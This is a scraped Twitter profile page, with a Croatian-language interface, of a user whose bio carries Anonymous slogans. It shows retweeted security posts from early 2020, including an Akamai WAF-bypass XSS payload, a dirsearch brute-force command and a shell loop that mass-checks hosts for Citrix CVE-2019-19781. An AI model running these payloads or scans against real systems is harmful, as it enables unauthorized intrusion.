sagar yadav

@sagaryadav8742

We Are Anonymous. We Are Legion. We Do Not Forgive. We Do Not Forget. Expect Us

Vrijeme pridruživanja: kolovoz 2018.

Tweetovi

Blokirali ste korisnika/cu @sagaryadav8742

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @sagaryadav8742

  1. prije 19 sati

    Here comes another teaser of our guest & keynote speakers. UNITED CON on February 28 & 29, 2020 at DTU, New Delhi, India 🇮🇳 Register your seats now.

    Poništi
  2. Poništi
  3. proslijedio/la je Tweet
    2. velj

    -2020-7799 FusionAuth RCE via Apache Freemarker Template

    Poništi
  4. proslijedio/la je Tweet
    2. velj
    Poništi
  5. proslijedio/la je Tweet
    31. sij

    Akamai WAF Bypass, worked on a recent program <x onauxclick=a=alert,a(domain)>click

    Poništi
  6. Poništi
  7. proslijedio/la je Tweet
    27. sij

    When you're brute forcing for endpoints, don't forget to add extensions. You can also use this method to discover backup files. Here's a command I use frequently: dirsearch -e php,asp,aspx,jsp,py,txt,conf,config,bak,backup,swp,old,db,sql -u <target>

    Poništi
  8. proslijedio/la je Tweet
    26. sij

    Ladies and gentlemen, I present you a working Remote Code Execution (RCE) exploit for the Remote Desktop Gateway (CVE-2020-0609 & CVE-2020-0610). Accidentally followed a few rabbit holes but got it to work! Time to write a blog post ;) Don't forget to patch!

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet

    CVE-2020-2551 Weblogic RCE with iiop protocol For 12.1.3 & 12.2.1.4

    Poništi
  10. proslijedio/la je Tweet
    18. sij

    How to find important information in github(with gitrob) New post by , , , ,

    Poništi
  11. Poništi
  12. proslijedio/la je Tweet
    13. sij
    Poništi
  13. Poništi
  14. proslijedio/la je Tweet
    13. sij

    Want Free💰? Jump on the Citrix wagon! Pick a program on git clone cd check-cve-2019-19781 pip3 install -r requirements.txt cat hosts.txt | while read url ; do cve-2019-19781 ;done > loot.txt 2>&1 cat loot.txt | grep appear

    Poništi
  15. proslijedio/la je Tweet
    12. sij

    Introducing velocity, Speed up network connections in Python with DNS caching that applies to everything from sockets to HTTP requests. Activates globally with a single import. Github: Oh and I am now on Patreon

    Poništi
  16. proslijedio/la je Tweet
    13. sij
    Poništi
  17. proslijedio/la je Tweet
    13. sij

    Update CVE-2019-19781 You can exploit the vulnerability without the file and only use the file ! You can inject your payload inside the name of the XML file and fire the command execution ! 🔥💪

    Prikaži ovu nit
    Poništi
  18. proslijedio/la je Tweet
    13. sij

    Information Disclosure at PayPal and Xoom (PayPal Acquisition) via Simple Google Dork - 1,000 USD

    Poništi
  19. proslijedio/la je Tweet

    🚨 There is now a public, on Github, working exploit for Citrix vulnerability CVE-2019-19781. This is going to get very messy.

    Prikaži ovu nit
    Poništi
  20. proslijedio/la je Tweet
    7. sij

    So my guest blog post for about my recon techniques is finally out. Check it out here-

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·